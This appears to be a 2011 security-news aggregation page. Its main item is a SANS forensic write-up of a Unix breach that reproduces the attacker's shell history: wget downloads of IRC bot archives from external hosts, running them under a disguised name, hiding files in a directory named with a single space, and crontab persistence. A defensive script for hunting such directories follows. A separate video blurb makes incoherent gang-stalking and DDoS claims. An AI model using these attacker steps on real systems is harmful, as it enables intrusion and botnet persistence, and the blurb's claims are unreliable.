
Week in review: Massive iFrame injection attack, Anonymous/LulzSec arrests and Facebook phishing

News | Monday 1 August 2011 2:45 am

Here's an overview of some of last week's most interesting news and articles:

Global analysis of 10 million web attacks
Web applications, on average, experience twenty seven attacks per hour, or…

View full post on Help Net Security – News

Anatomy of a Unix breach, (Sun, Jul 31st)

News | Monday 1 August 2011 1:06 am

./run
We are not quite sure whether any of the above exploits was successful. The id command, or the exploit itself, would have told the attacker whether he got lucky, but there aren’t any traces in the shell history file that would tell us either way.
In any case, Phase #3a follows: the attacker installs some goodies. virus.tar isn’t really a virus; it is a copy of EnergyMech, an IRC bot. Note how the bad guy uses nano to edit the config file, which tells us that he isn’t all that experienced on Unix. A real Unix hacker would most likely use vi, because vi is present on all Unix flavors and versions. Note also how he calls the IRC bot Evolution when he starts it, likely hoping that an admin would overlook it in a casual investigation.
/sbin/ifconfig -a | grep inet

wget http://f……com/storm12/virus.tar

tar xvf virus.tar

rm -rf virus.tar

cd virus

ls -a

nano start

nano inst

chmod +x *

./autorun

./start Evolution
Phase #3b: Install some more goodies. egg.tgz is a copy of Eggdrop, another IRC bot. Note how the bad guy puts the files into a directory called " " (a single space). If you want to search for such directories on your system, try this:

# find / -name " "

mkdir

cd

ls -a

wget http://c…….org/egg.tgz

cd

tar zxvf egg.tgz

rm -rf egg.tgz

cd .access.log

ls -a

chmod +x *

./eggdrop -m bot1.conf

ls -a

cd scripts

nano respond.tcl

pwd

Phase #4: The attacker wants to make sure that access can be regained, and configures the crontab to restart some of his processes automatically on a schedule.
crontab -l

crontab -e

exit
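
The directory search suggested in Phase #3b, generalized as an added example (not part of the original SANS post): besides the single-space name it also flags names made only of whitespace or dots, and hidden directories named like a file, such as the .access.log directory seen in the history. The function names and the list of file-like suffixes are assumptions chosen for illustration.

```sh
#!/bin/sh
# classify_dir NAME
# Prints why a directory name looks suspicious and returns 0,
# or prints nothing and returns 1 for an ordinary name.
classify_dir() {
    case "$1" in
        ""|.|..) return 1 ;;
    esac
    case "$1" in
        *[![:space:]]*) ;;   # has a visible character: keep checking
        *) echo "whitespace-only name"; return 0 ;;
    esac
    case "$1" in
        *[!.[:space:]]*) ;;  # has something other than dots and blanks
        *) echo "dots-and-whitespace name"; return 0 ;;
    esac
    case "$1" in
        # Hidden directory that poses as a file (suffix list is an assumption).
        .?*.log|.?*.conf|.?*.txt|.?*.pid)
            echo "hidden directory named like a file"; return 0 ;;
    esac
    return 1
}

# hunt_odd_dirs [ROOT]
# Walks ROOT (default /) on one filesystem and reports matching directories.
# Paths are printed in brackets so trailing blanks stay visible.
# Limitation: names containing a newline are split by the line-based read.
hunt_odd_dirs() {
    find "${1:-/}" -xdev -type d 2>/dev/null |
    while IFS= read -r dir; do
        if reason=$(classify_dir "${dir##*/}"); then
            printf '%s\t[%s]\n' "$reason" "$dir"
        fi
    done
}
```

Run `hunt_odd_dirs /` as root so that unreadable directories are not silently skipped; a hit is a lead to inspect, not proof of compromise.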

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

View full post on SANS Internet Storm Center, InfoCON: green

Cyberwarfare/Cyberterrorism: Spinning Cursor–My Macbook Crashed for 9TH TIME in 36 HOURS

Video | Monday 1 August 2011 12:28 am


I’m at the end of a webinar and the criminals crash the network server. This is classic DDOS and the entire false flag domestic terrorism organized crime gang stalking network campaign is UNCONSTITUTIONAL since it’s supposedly government backed by the use of military resources, technology, techniques and tactics as well as illegal, unconscionable and immoral.

PLCs a prison vulnerability: researchers

News | Monday 1 August 2011 12:08 am

Now there’s a jailbreak

Hard on the heels of warnings that critical systems in America are vulnerable to Stuxnet-style attacks, a group of security researchers says SCADA systems and PLCs make prisons vulnerable to computer-based attacks.…

View full post on The Register – Security


